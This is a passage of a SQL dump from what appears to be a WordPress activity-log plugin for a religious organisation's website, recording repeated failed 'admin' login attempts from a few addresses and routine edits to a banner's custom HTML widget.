n_failed'),(225935,37859,'_server_remote_addr','45.136.118.x'),(225936,37860,'failed_username','admin'),(225937,37860,'server_http_user_agent','Mozilla/5.0'),(225938,37860,'_message_key','user_unknown_login_failed'),(225939,37860,'_server_remote_addr','45.136.118.x'),(225940,37861,'failed_username','admin'),(225941,37861,'server_http_user_agent','Mozilla/5.0'),(225942,37861,'_message_key','user_unknown_login_failed'),(225943,37861,'_server_remote_addr','45.136.118.x'),(225944,37862,'failed_username','admin'),(225945,37862,'server_http_user_agent','Mozilla/5.0'),(225946,37862,'_message_key','user_unknown_login_failed'),(225947,37862,'_server_remote_addr','20.169.8.x'),(225948,37863,'failed_username','admin'),(225949,37863,'server_http_user_agent','Mozilla/5.0'),(225950,37863,'_message_key','user_unknown_login_failed'),(225951,37863,'_server_remote_addr','45.136.118.x'),(225952,37864,'failed_username','admin'),(225953,37864,'server_http_user_agent','Mozilla/5.0'),(225954,37864,'_message_key','user_unknown_login_failed'),(225955,37864,'_server_remote_addr','45.136.118.x'),(225956,37865,'failed_username','admin'),(225957,37865,'server_http_user_agent','Mozilla/5.0'),(225958,37865,'_message_key','user_unknown_login_failed'),(225959,37865,'_server_remote_addr','45.136.118.x'),(225960,37866,'failed_username','admin'),(225961,37866,'server_http_user_agent','Mozilla/5.0'),(225962,37866,'_message_key','user_unknown_login_failed'),(225963,37866,'_server_remote_addr','45.136.118.x'),(225964,37867,'failed_username','admin'),(225965,37867,'server_http_user_agent','Mozilla/5.0'),(225966,37867,'_message_key','user_unknown_login_failed'),(225967,37867,'_server_remote_addr','20.169.8.x'),(225968,37868,'failed_username','admin'),(225969,37868,'server_http_user_agent','Mozilla/5.0'),(225970,37868,'_message_key','user_unknown_login_failed'),(225971,37868,'_server_remote_addr','45.136.118.x'),(225972,37869,'failed_username','admin'),(225973,37869,'server_http_user_agent','Mozilla/5.0'),(225974,37869,'_message_key','user_unknown_login_failed'),(225975,37869,'_server_remote_addr','45.136.118.x'),(225976,37870,'failed_username','admin'),(225977,37870,'server_http_user_agent','Mozilla/5.0'),(225978,37870,'_message_key','user_unknown_login_failed'),(225979,37870,'_server_remote_addr','45.136.118.x'),(225980,37871,'failed_username','admin'),(225981,37871,'server_http_user_agent','Mozilla/5.0'),(225982,37871,'_message_key','user_unknown_login_failed'),(225983,37871,'_server_remote_addr','45.136.118.x'),(225984,37872,'failed_username','admin'),(225985,37872,'server_http_user_agent','Mozilla/5.0'),(225986,37872,'_message_key','user_unknown_login_failed'),(225987,37872,'_server_remote_addr','20.169.8.x'),(225988,37873,'failed_username','admin'),(225989,37873,'server_http_user_agent','Mozilla/5.0'),(225990,37873,'_message_key','user_unknown_login_failed'),(225991,37873,'_server_remote_addr','45.136.118.x'),(225992,37874,'failed_username','admin'),(225993,37874,'server_http_user_agent','Mozilla/5.0'),(225994,37874,'_message_key','user_unknown_login_failed'),(225995,37874,'_server_remote_addr','45.136.118.x'),(225996,37875,'failed_username','admin'),(225997,37875,'server_http_user_agent','Mozilla/5.0'),(225998,37875,'_message_key','user_unknown_login_failed'),(225999,37875,'_server_remote_addr','45.136.118.x'),(226000,37876,'failed_username','admin'),(226001,37876,'server_http_user_agent','Mozilla/5.0'),(226002,37876,'_message_key','user_unknown_login_failed'),(226003,37876,'_server_remote_addr','45.136.118.x'),(226004,37877,'failed_username','admin'),(226005,37877,'server_http_user_agent','Mozilla/5.0'),(226006,37877,'_message_key','user_unknown_login_failed'),(226007,37877,'_server_remote_addr','20.169.8.x'),(226008,37878,'failed_username','admin'),(226009,37878,'server_http_user_agent','Mozilla/5.0'),(226010,37878,'_message_key','user_unknown_login_failed'),(226011,37878,'_server_remote_addr','45.136.118.x'),(226012,37879,'failed_username','admin'),(226013,37879,'server_http_user_agent','Mozilla/5.0'),(226014,37879,'_message_key','user_unknown_login_failed'),(226015,37879,'_server_remote_addr','45.136.118.x'),(226016,37880,'failed_username','admin'),(226017,37880,'server_http_user_agent','Mozilla/5.0'),(226018,37880,'_message_key','user_unknown_login_failed'),(226019,37880,'_server_remote_addr','45.136.118.x'),(226020,37881,'failed_username','admin'),(226021,37881,'server_http_user_agent','Mozilla/5.0'),(226022,37881,'_message_key','user_unknown_login_failed'),(226023,37881,'_server_remote_addr','45.136.118.x'),(226024,37882,'failed_username','admin'),(226025,37882,'server_http_user_agent','Mozilla/5.0'),(226026,37882,'_message_key','user_unknown_login_failed'),(226027,37882,'_server_remote_addr','20.169.8.x'),(226028,37883,'failed_username','admin'),(226029,37883,'server_http_user_agent','Mozilla/5.0'),(226030,37883,'_message_key','user_unknown_login_failed'),(226031,37883,'_server_remote_addr','45.136.118.x'),(226032,37884,'failed_username','admin'),(226033,37884,'server_http_user_agent','Mozilla/5.0'),(226034,37884,'_message_key','user_unknown_login_failed'),(226035,37884,'_server_remote_addr','45.136.118.x'),(226036,37885,'failed_username','admin'),(226037,37885,'server_http_user_agent','Mozilla/5.0'),(226038,37885,'_message_key','user_unknown_login_failed'),(226039,37885,'_server_remote_addr','45.136.118.x'),(226040,37886,'failed_username','admin'),(226041,37886,'server_http_user_agent','Mozilla/5.0'),(226042,37886,'_message_key','user_unknown_login_failed'),(226043,37886,'_server_remote_addr','45.136.118.x'),(226044,37887,'failed_username','admin'),(226045,37887,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(226046,37887,'_message_key','user_unknown_login_failed'),(226047,37887,'_xmlrpc_request','true'),(226048,37887,'_server_remote_addr','20.168.14.x'),(226049,37888,'failed_username','admin'),(226050,37888,'server_http_user_agent','Mozilla/5.0'),(226051,37888,'_message_key','user_unknown_login_failed'),(226052,37888,'_server_remote_addr','20.169.8.x'),(226053,37889,'failed_username','admin'),(226054,37889,'server_http_user_agent','Mozilla/5.0'),(226055,37889,'_message_key','user_unknown_login_failed'),(226056,37889,'_server_remote_addr','45.136.118.x'),(226057,37890,'failed_username','admin'),(226058,37890,'server_http_user_agent','Mozilla/5.0'),(226059,37890,'_message_key','user_unknown_login_failed'),(226060,37890,'_server_remote_addr','45.136.118.x'),(226061,37891,'failed_username','admin'),(226062,37891,'server_http_user_agent','Mozilla/5.0'),(226063,37891,'_message_key','user_unknown_login_failed'),(226064,37891,'_server_remote_addr','45.136.118.x'),(226065,37892,'failed_username','admin'),(226066,37892,'server_http_user_agent','Mozilla/5.0'),(226067,37892,'_message_key','user_unknown_login_failed'),(226068,37892,'_server_remote_addr','45.136.118.x'),(226069,37893,'failed_username','admin'),(226070,37893,'server_http_user_agent','Mozilla/5.0'),(226071,37893,'_message_key','user_unknown_login_failed'),(226072,37893,'_server_remote_addr','45.136.118.x'),(226073,37894,'failed_username','admin'),(226074,37894,'server_http_user_agent','Mozilla/5.0'),(226075,37894,'_message_key','user_unknown_login_failed'),(226076,37894,'_server_remote_addr','20.169.8.x'),(226077,37895,'failed_username','admin'),(226078,37895,'server_http_user_agent','Mozilla/5.0'),(226079,37895,'_message_key','user_unknown_login_failed'),(226080,37895,'_server_remote_addr','45.136.118.x'),(226081,37896,'failed_username','admin'),(226082,37896,'server_http_user_agent','Mozilla/5.0'),(226083,37896,'_message_key','user_unknown_login_failed'),(226084,37896,'_server_remote_addr','45.136.118.x'),(226085,37897,'failed_username','admin'),(226086,37897,'server_http_user_agent','Mozilla/5.0'),(226087,37897,'_message_key','user_unknown_login_failed'),(226088,37897,'_server_remote_addr','45.136.118.x'),(226089,37898,'failed_username','admin'),(226090,37898,'server_http_user_agent','Mozilla/5.0'),(226091,37898,'_message_key','user_unknown_login_failed'),(226092,37898,'_server_remote_addr','45.136.118.x'),(226093,37899,'failed_username','admin'),(226094,37899,'server_http_user_agent','Mozilla/5.0'),(226095,37899,'_message_key','user_unknown_login_failed'),(226096,37899,'_server_remote_addr','20.169.8.x'),(226097,37900,'failed_username','admin'),(226098,37900,'server_http_user_agent','Mozilla/5.0'),(226099,37900,'_message_key','user_unknown_login_failed'),(226100,37900,'_server_remote_addr','45.136.118.x'),(226101,37901,'failed_username','admin'),(226102,37901,'server_http_user_agent','Mozilla/5.0'),(226103,37901,'_message_key','user_unknown_login_failed'),(226104,37901,'_server_remote_addr','45.136.118.x'),(226105,37902,'failed_username','admin'),(226106,37902,'server_http_user_agent','Mozilla/5.0'),(226107,37902,'_message_key','user_unknown_login_failed'),(226108,37902,'_server_remote_addr','45.136.118.x'),(226109,37903,'failed_username','admin'),(226110,37903,'server_http_user_agent','Mozilla/5.0'),(226111,37903,'_message_key','user_unknown_login_failed'),(226112,37903,'_server_remote_addr','45.136.118.x'),(226113,37904,'failed_username','admin'),(226114,37904,'server_http_user_agent','Mozilla/5.0'),(226115,37904,'_message_key','user_unknown_login_failed'),(226116,37904,'_server_remote_addr','45.136.118.x'),(226117,37905,'failed_username','admin'),(226118,37905,'server_http_user_agent','Mozilla/5.0'),(226119,37905,'_message_key','user_unknown_login_failed'),(226120,37905,'_server_remote_addr','45.136.118.x'),(226121,37906,'failed_username','admin'),(226122,37906,'server_http_user_agent','Mozilla/5.0'),(226123,37906,'_message_key','user_unknown_login_failed'),(226124,37906,'_server_remote_addr','45.136.118.x'),(226125,37907,'failed_username','admin'),(226126,37907,'server_http_user_agent','Mozilla/5.0'),(226127,37907,'_message_key','user_unknown_login_failed'),(226128,37907,'_server_remote_addr','45.136.118.x'),(226129,37908,'failed_username','admin'),(226130,37908,'server_http_user_agent','Mozilla/5.0'),(226131,37908,'_message_key','user_unknown_login_failed'),(226132,37908,'_server_remote_addr','45.136.118.x'),(226133,37909,'failed_username','admin'),(226134,37909,'server_http_user_agent','Mozilla/5.0'),(226135,37909,'_message_key','user_unknown_login_failed'),(226136,37909,'_server_remote_addr','45.136.118.x'),(226137,37910,'failed_username','admin'),(226138,37910,'server_http_user_agent','Mozilla/5.0'),(226139,37910,'_message_key','user_unknown_login_failed'),(226140,37910,'_server_remote_addr','45.136.118.x'),(226141,37911,'failed_username','admin'),(226142,37911,'server_http_user_agent','Mozilla/5.0'),(226143,37911,'_message_key','user_unknown_login_failed'),(226144,37911,'_server_remote_addr','45.136.118.x'),(226145,37912,'failed_username','admin'),(226146,37912,'server_http_user_agent','Mozilla/5.0'),(226147,37912,'_message_key','user_unknown_login_failed'),(226148,37912,'_server_remote_addr','45.136.118.x'),(226149,37913,'failed_username','admin'),(226150,37913,'server_http_user_agent','Mozilla/5.0'),(226151,37913,'_message_key','user_unknown_login_failed'),(226152,37913,'_server_remote_addr','45.136.118.x'),(226153,37914,'failed_username','admin'),(226154,37914,'server_http_user_agent','Mozilla/5.0'),(226155,37914,'_message_key','user_unknown_login_failed'),(226156,37914,'_server_remote_addr','45.136.118.x'),(226157,37915,'failed_username','admin'),(226158,37915,'server_http_user_agent','Mozilla/5.0'),(226159,37915,'_message_key','user_unknown_login_failed'),(226160,37915,'_server_remote_addr','45.136.118.x'),(226161,37916,'failed_username','admin'),(226162,37916,'server_http_user_agent','Mozilla/5.0'),(226163,37916,'_message_key','user_unknown_login_failed'),(226164,37916,'_server_remote_addr','45.136.118.x'),(226165,37917,'failed_username','admin'),(226166,37917,'server_http_user_agent','Mozilla/5.0'),(226167,37917,'_message_key','user_unknown_login_failed'),(226168,37917,'_server_remote_addr','45.136.118.x'),(226169,37918,'failed_username','admin'),(226170,37918,'server_http_user_agent','Mozilla/5.0'),(226171,37918,'_message_key','user_unknown_login_failed'),(226172,37918,'_server_remote_addr','45.136.118.x'),(226173,37919,'failed_username','admin'),(226174,37919,'server_http_user_agent','Mozilla/5.0'),(226175,37919,'_message_key','user_unknown_login_failed'),(226176,37919,'_server_remote_addr','45.136.118.x'),(226177,37920,'failed_username','admin'),(226178,37920,'server_http_user_agent','Mozilla/5.0'),(226179,37920,'_message_key','user_unknown_login_failed'),(226180,37920,'_server_remote_addr','45.136.118.x'),(226181,37921,'failed_username','admin'),(226182,37921,'server_http_user_agent','Mozilla/5.0'),(226183,37921,'_message_key','user_unknown_login_failed'),(226184,37921,'_server_remote_addr','45.136.118.x'),(226185,37922,'failed_username','admin'),(226186,37922,'server_http_user_agent','Mozilla/5.0'),(226187,37922,'_message_key','user_unknown_login_failed'),(226188,37922,'_server_remote_addr','45.136.118.x'),(226189,37923,'failed_username','admin'),(226190,37923,'server_http_user_agent','Mozilla/5.0'),(226191,37923,'_message_key','user_unknown_login_failed'),(226192,37923,'_server_remote_addr','45.136.118.x'),(226193,37924,'failed_username','admin'),(226194,37924,'server_http_user_agent','Mozilla/5.0'),(226195,37924,'_message_key','user_unknown_login_failed'),(226196,37924,'_server_remote_addr','45.136.118.x'),(226197,37925,'failed_username','admin'),(226198,37925,'server_http_user_agent','Mozilla/5.0'),(226199,37925,'_message_key','user_unknown_login_failed'),(226200,37925,'_server_remote_addr','45.136.118.x'),(226201,37926,'failed_username','admin'),(226202,37926,'server_http_user_agent','Mozilla/5.0'),(226203,37926,'_message_key','user_unknown_login_failed'),(226204,37926,'_server_remote_addr','45.136.118.x'),(226205,37927,'failed_username','admin'),(226206,37927,'server_http_user_agent','Mozilla/5.0'),(226207,37927,'_message_key','user_unknown_login_failed'),(226208,37927,'_server_remote_addr','45.136.118.x'),(226209,37928,'failed_username','admin'),(226210,37928,'server_http_user_agent','Mozilla/5.0'),(226211,37928,'_message_key','user_unknown_login_failed'),(226212,37928,'_server_remote_addr','45.136.118.x'),(226213,37929,'failed_username','admin'),(226214,37929,'server_http_user_agent','Mozilla/5.0'),(226215,37929,'_message_key','user_unknown_login_failed'),(226216,37929,'_server_remote_addr','45.136.118.x'),(226217,37930,'failed_username','admin'),(226218,37930,'server_http_user_agent','Mozilla/5.0'),(226219,37930,'_message_key','user_unknown_login_failed'),(226220,37930,'_server_remote_addr','45.136.118.x'),(226221,37931,'failed_username','admin'),(226222,37931,'server_http_user_agent','Mozilla/5.0'),(226223,37931,'_message_key','user_unknown_login_failed'),(226224,37931,'_server_remote_addr','45.136.118.x'),(226225,37932,'failed_username','admin'),(226226,37932,'server_http_user_agent','Mozilla/5.0'),(226227,37932,'_message_key','user_unknown_login_failed'),(226228,37932,'_server_remote_addr','45.136.118.x'),(226229,37933,'failed_username','admin'),(226230,37933,'server_http_user_agent','Mozilla/5.0'),(226231,37933,'_message_key','user_unknown_login_failed'),(226232,37933,'_server_remote_addr','45.136.118.x'),(226233,37934,'failed_username','admin'),(226234,37934,'server_http_user_agent','Mozilla/5.0'),(226235,37934,'_message_key','user_unknown_login_failed'),(226236,37934,'_server_remote_addr','45.136.118.x'),(226237,37935,'failed_username','admin'),(226238,37935,'server_http_user_agent','Mozilla/5.0'),(226239,37935,'_message_key','user_unknown_login_failed'),(226240,37935,'_server_remote_addr','45.136.118.x'),(226241,37936,'failed_username','admin'),(226242,37936,'server_http_user_agent','Mozilla/5.0'),(226243,37936,'_message_key','user_unknown_login_failed'),(226244,37936,'_server_remote_addr','45.136.118.x'),(226245,37937,'failed_username','admin'),(226246,37937,'server_http_user_agent','Mozilla/5.0'),(226247,37937,'_message_key','user_unknown_login_failed'),(226248,37937,'_server_remote_addr','45.136.118.x'),(226249,37938,'failed_username','admin'),(226250,37938,'server_http_user_agent','Mozilla/5.0'),(226251,37938,'_message_key','user_unknown_login_failed'),(226252,37938,'_server_remote_addr','45.136.118.x'),(226253,37939,'failed_username','admin'),(226254,37939,'server_http_user_agent','Mozilla/5.0'),(226255,37939,'_message_key','user_unknown_login_failed'),(226256,37939,'_server_remote_addr','45.136.118.x'),(226257,37940,'failed_username','admin'),(226258,37940,'server_http_user_agent','Mozilla/5.0'),(226259,37940,'_message_key','user_unknown_login_failed'),(226260,37940,'_server_remote_addr','45.136.118.x'),(226261,37941,'failed_username','admin'),(226262,37941,'server_http_user_agent','Mozilla/5.0'),(226263,37941,'_message_key','user_unknown_login_failed'),(226264,37941,'_server_remote_addr','45.136.118.x'),(226265,37942,'failed_username','admin'),(226266,37942,'server_http_user_agent','Mozilla/5.0'),(226267,37942,'_message_key','user_unknown_login_failed'),(226268,37942,'_server_remote_addr','45.136.118.x'),(226269,37943,'failed_username','admin'),(226270,37943,'server_http_user_agent','Mozilla/5.0'),(226271,37943,'_message_key','user_unknown_login_failed'),(226272,37943,'_server_remote_addr','45.136.118.x'),(226273,37944,'failed_username','admin'),(226274,37944,'server_http_user_agent','Mozilla/5.0'),(226275,37944,'_message_key','user_unknown_login_failed'),(226276,37944,'_server_remote_addr','45.136.118.x'),(226277,37945,'failed_username','admin'),(226278,37945,'server_http_user_agent','Mozilla/5.0'),(226279,37945,'_message_key','user_unknown_login_failed'),(226280,37945,'_server_remote_addr','45.136.118.x'),(226281,37946,'failed_username','admin'),(226282,37946,'server_http_user_agent','Mozilla/5.0'),(226283,37946,'_message_key','user_unknown_login_failed'),(226284,37946,'_server_remote_addr','45.136.118.x'),(226285,37947,'failed_username','admin'),(226286,37947,'server_http_user_agent','Mozilla/5.0'),(226287,37947,'_message_key','user_unknown_login_failed'),(226288,37947,'_server_remote_addr','45.136.118.x'),(226289,37948,'failed_username','admin'),(226290,37948,'server_http_user_agent','Mozilla/5.0'),(226291,37948,'_message_key','user_unknown_login_failed'),(226292,37948,'_server_remote_addr','45.136.118.x'),(226293,37949,'failed_username','admin'),(226294,37949,'server_http_user_agent','Mozilla/5.0'),(226295,37949,'_message_key','user_unknown_login_failed'),(226296,37949,'_server_remote_addr','45.136.118.x'),(226297,37950,'failed_username','admin'),(226298,37950,'server_http_user_agent','Mozilla/5.0'),(226299,37950,'_message_key','user_unknown_login_failed'),(226300,37950,'_server_remote_addr','45.136.118.x'),(226301,37951,'failed_username','admin'),(226302,37951,'server_http_user_agent','Mozilla/5.0'),(226303,37951,'_message_key','user_unknown_login_failed'),(226304,37951,'_server_remote_addr','45.136.118.x'),(226305,37952,'failed_username','admin'),(226306,37952,'server_http_user_agent','Mozilla/5.0'),(226307,37952,'_message_key','user_unknown_login_failed'),(226308,37952,'_server_remote_addr','45.136.118.x'),(226309,37953,'failed_username','admin'),(226310,37953,'server_http_user_agent','Mozilla/5.0'),(226311,37953,'_message_key','user_unknown_login_failed'),(226312,37953,'_server_remote_addr','45.136.118.x'),(226313,37954,'post_id','269207'),(226314,37954,'post_type','nf_sub'),(226315,37954,'post_title',''),(226316,37954,'_message_key','post_updated'),(226317,37954,'_server_remote_addr','68.102.18.x'),(226318,37954,'_server_http_referer','https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/'),(226319,37955,'failed_username','admin'),(226320,37955,'server_http_user_agent','Mozilla/5.0'),(226321,37955,'_message_key','user_unknown_login_failed'),(226322,37955,'_server_remote_addr','45.136.118.x'),(226323,37956,'failed_username','admin'),(226324,37956,'server_http_user_agent','Mozilla/5.0'),(226325,37956,'_message_key','user_unknown_login_failed'),(226326,37956,'_server_remote_addr','45.136.118.x'),(226327,37957,'failed_username','admin'),(226328,37957,'server_http_user_agent','Mozilla/5.0'),(226329,37957,'_message_key','user_unknown_login_failed'),(226330,37957,'_server_remote_addr','45.136.118.x'),(231459,39173,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 105px; margin-bottom: 260px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:70px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(231460,39173,'_message_key','widget_edited'),(231461,39173,'_user_id','2'),(231462,39173,'_user_login','S8zhaBda'),(231463,39173,'_user_email','nada@zipnadanot.org'),(231464,39173,'_server_remote_addr','76.130.120.x'),(231465,39173,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(231466,39174,'setting_id','widget_custom_html[6]'),(231467,39174,'setting_old_value','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 105px; margin-bottom: 260px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:60px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(231468,39174,'setting_new_value','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 105px; margin-bottom: 260px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:70px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(231469,39174,'control_id','widget_custom_html[6]'),(231470,39174,'control_label','Custom HTML'),(231471,39174,'control_type','widget_form'),(231472,39174,'_message_key','appearance_customized'),(231473,39174,'_user_id','2'),(231474,39174,'_user_login','S8zhaBda'),(231475,39174,'_user_email','nada@zipnadanot.org'),(231476,39174,'_server_remote_addr','76.130.120.x'),(231477,39174,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(231478,39175,'widget_id_base','custom_html'),(231479,39175,'widget_name_translated','Custom HTML'),(231480,39175,'sidebar_id','null'),(231481,39175,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 105px; margin-bottom: 260px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:70px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(231482,39175,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 105px; margin-bottom: 260px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:70px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(231483,39175,'_message_key','widget_edited'),(231484,39175,'_user_id','2'),(231485,39175,'_user_login','S8zhaBda'),(231486,39175,'_user_email','nada@zipnadanot.org'),(231487,39175,'_server_remote_addr','76.130.120.x'),(231488,39175,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(231489,39176,'widget_id_base','custom_html'),(231490,39176,'widget_name_translated','Custom HTML'),(231491,39176,'sidebar_id','null'),(231492,39176,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 105px; margin-bottom: 260px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:70px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(231493,39176,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 145px; margin-bottom: 260px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:70px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; color: #ffffff; line-height: 1.1em; font-weight: bold; letter-spacing: 2px; text-align: center;\\\">THE PATH OF SPIRITUAL FREEDOM<\\/span><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(231494,39176,'_message_key','widget_edited'),(231495,39176,'_user_id','2'),(231496,39176,'_user_login','S8zhaBda'),(231497,39176,'_user_email','nada@zipnadanot.org'),(231498,39176,'_server_remote_addr','76.130.120.x'),(231499,39176,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(231500,39177,'setting_id','widget_custom_html[6]'),(231501,39177,'setting_old_value','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\">\\r\\n<div class=\\\"col-md-12 col-xs-12 col-sm-12 col-lg-12\\\" style=\\\"margin-top: 105px; margin-bottom: 260px;\\\">\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-transform: capitalize; font-size:70px; text-shadow: #333333 2px 2px 4px; color: #ffffff; margin-top: 20px; margin-bottom: 70px; line-height: 60px; font-family: \'Times New Roman\', Times, serif; font-weight: 400; letter-spacing: 2px; text-align: center; border-width: 0px;\\\">ECKANKAR<\\/p>\\r\\n<p class=\\\"hidden-mobile\\\" style=\\\"text-shadow: #333333 2px 2px 4px; text-align: center; border-width: 0px; margin-top: -51px;\\\"><br>\\r\\n<span style=\\\"font-size: 40px; 